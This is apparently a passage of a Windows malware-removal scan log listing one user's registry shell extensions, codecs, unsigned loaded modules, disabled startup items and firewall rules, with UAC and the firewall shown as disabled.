CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll (Google Inc -> Google LLC)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll (Google Inc -> Google LLC)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.302\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\FileSyncApi64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll -> No File
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [DivXShellExtensionItem] -> {48A8A3B0-57E8-4F2B-A49D-19E02B92377B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [DivXShellExtensionItem64] -> {6B49A276-0DBA-43F4-BC96-A841AD11B40B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => c:\program files (x86)\real\realplayer\RPDS\Bin64\rpcloudview.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-03-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32-x32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32: [vidc.yv12] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32-x32: [VIDC.LAGS] => lagarith.dll
HKLM\...\Drivers32: [vidc.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [179200 2009-01-25] () [File not signed]
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\Vladana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) =============
 
2013-05-18 17:25 - 2013-05-18 17:25 - 001350656 _____ ( ) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNGadgetClass\10d2c6adb5906a1d7bbeb75d2a713c07\PFNGadgetClass.ni.dll
2017-09-02 13:47 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-09-02 13:47 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-06-05 02:08 - 2014-05-19 16:19 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2018-06-05 02:08 - 2014-10-31 15:40 - 001498112 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000113664 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Tasks.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000139776 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Utility.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000758784 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Core.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 001778688 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Ctrls.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000046080 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Localization.dll
2011-12-16 15:37 - 2011-12-16 15:37 - 002437632 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNCommon.dll
2011-12-16 15:38 - 2011-12-16 15:38 - 002246144 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNDevice.dll
2011-12-22 09:03 - 2011-12-22 09:03 - 002281984 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNWLAN.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000421888 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNLocSet\b7cc59ff84258f2c78492c7ef6c33d6e\PFNLocSet.ni.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000473088 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNSwData\9a909070ecd70366e5c577eb52b4bbda\PFNSwData.ni.dll
2012-03-08 12:17 - 2012-03-08 12:17 - 000333312 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\BTHSSupplicant.dll
2012-03-01 10:52 - 2012-03-01 10:52 - 000105472 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\UsR3IoPort.dll
2012-03-29 06:37 - 2012-03-29 06:37 - 000498176 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\P2PSupplicant.dll
2012-04-17 18:35 - 2012-04-17 18:35 - 000168448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\PsRegApi.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000284160 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\TraceApi.dll
2012-04-17 18:36 - 2012-04-17 18:36 - 003280896 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\AmtWsMan.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000102400 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\DbEngine.dll
2012-04-17 18:38 - 2012-04-17 18:38 - 000104448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IntStngs.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000054272 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2012-04-17 18:46 - 2012-04-17 18:46 - 000545792 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\MurocApi.dll
2012-04-17 18:50 - 2012-04-17 18:50 - 000324608 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\panihvint.dll
2012-04-17 18:43 - 2012-04-17 18:43 - 001051136 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\PfMgrApi.dll
2012-04-17 18:51 - 2012-04-17 18:51 - 000178176 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\Ps7ZCfgS.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000020992 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\S24MUDLL.dll
2012-04-17 18:45 - 2012-04-17 18:45 - 002463744 _____ (Intel® Corporation) [File not signed] C:\Windows\System32\IWMSSvc.dll
2006-10-26 13:44 - 2006-10-26 13:44 - 000123904 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\csm.dll
2006-10-26 13:45 - 2006-10-26 13:45 - 000247296 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\msdbg2.dll
2012-04-17 17:52 - 2012-04-17 17:52 - 001830912 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2017-09-02 13:47 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-06-05 02:08 - 2014-10-31 15:41 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSProducstInfo.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:94A19129 [260]
 
==================== Safe Mode (Whitelisted) ==================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer trusted/restricted ==========
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2019-11-09 17:42 - 2019-11-18 19:26 - 000000822 _____ C:\Windows\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\PC Connectivity Solution\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x86;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x64;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\QuickTime\QTSystem\
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(If an entry is included in the fixlist, it will be removed.)
 
MSCONFIG\Services: BstHdAndroidSvc => 2
MSCONFIG\Services: BstHdLogRotatorSvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RealPlayer Cloud Service => 2
MSCONFIG\Services: RealPlayerUpdateSvc => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => C:\Windows\pss\ZenMate.bat.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: Google Update => "C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: NSU_agent => "C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe"
MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Vladana\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: Wondershare Helper Compact.exe => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{418A7595-F489-448D-A132-2A9519236EF0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Mobile Wireless Group -> )
FirewallRules: [{B0E6337C-DD13-46CD-A572-58359114E70E}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{5B4B9E35-FBA6-4F36-8798-35D35E29E74B}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{B1CC60A0-4651-4E6D-A4FA-32240C388099}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{A0A9A6FA-AE67-4AB9-B612-32D06F124746}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{CE426DDA-632D-4252-8AF5-B3999BF81124}] => (Allow) C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CDC85982-754B-4DE3-977B-6E479A26C388}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F565ACF8-37C4-4665-A110-386DCCDF81E9}] => (Allow) LPort=2869
FirewallRules: [{BA538C52-47F4-4638-88FB-D4E100881E6A}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{838DFD5B-BE28-4A8A-9D48-591EFEF35AB6}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [UDP Query User{7BCDD032-7F97-4FE8-ADB0-130474CDDD9F}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [{DAA4242B-32CB-43E0-B514-40A492583C52}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{87CC937C-627E-4461-A86D-A01FA1D52711}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{787EA532-6389-4D57-8CB4-56ED49F60E38}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [{F0F6824E-F9E8-401C-92A1-52EE1D31841E}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [TCP Query User{BE9D298D-4B00-4F7D-AA02-CE4B8C269C09}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [UDP Query User{010D4FEB-5458-4625-B346-3F087D27F4A3}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [TCP Query User{DF4734DC-C765-4167-986C-24CF01DB1137}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [UDP Query User{E878D949-B0E7-411A-8F5A-335EE806B7C2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C1202602-2671-439A-8CF4-FFA06CC539FB}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{3F9714B5-446C-4FD2-91A7-085A9AAF37D8}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [TCP Query User{813FD61F-108E-4C8F-8713-5C5C65A07F20}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{94D1C3B8-E5D6-406D-8550-D0FB1A8AFD18}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [{AD675AD4-8A27-4858-B7BF-64062E576C45}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FF4764D4-F4A6-4C99-B73E-53F8DE61E6F9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{61F7EE47-9BA9-4D47-ADB6-5E48B1DF1F11}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [TCP Query User{9DA426E5-870A-46BA-ACD6-3BECCA6D3981}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{E35C77F8-2476-4F58-B62F-633DD6DA4D7B}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{64ADE5CF-E0E0-432A-ADCA-107CEF11A830}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{29E89790-5F1F-403F-9200-85040488F6BF}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{051C8ED1-8257-4C07-9843-3A321CB1D2B5}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{11E9C41A-BB10-4AE0-86A2-D113F4631726}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [{10CC44FD-3D7B-40D9-B4E9-C8B90B3CDA05}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{0F44D93E-8116-4C28-A09E-375525612959}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{DE2D1B1A-A95A-4427-8BD7-97016C528F99}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
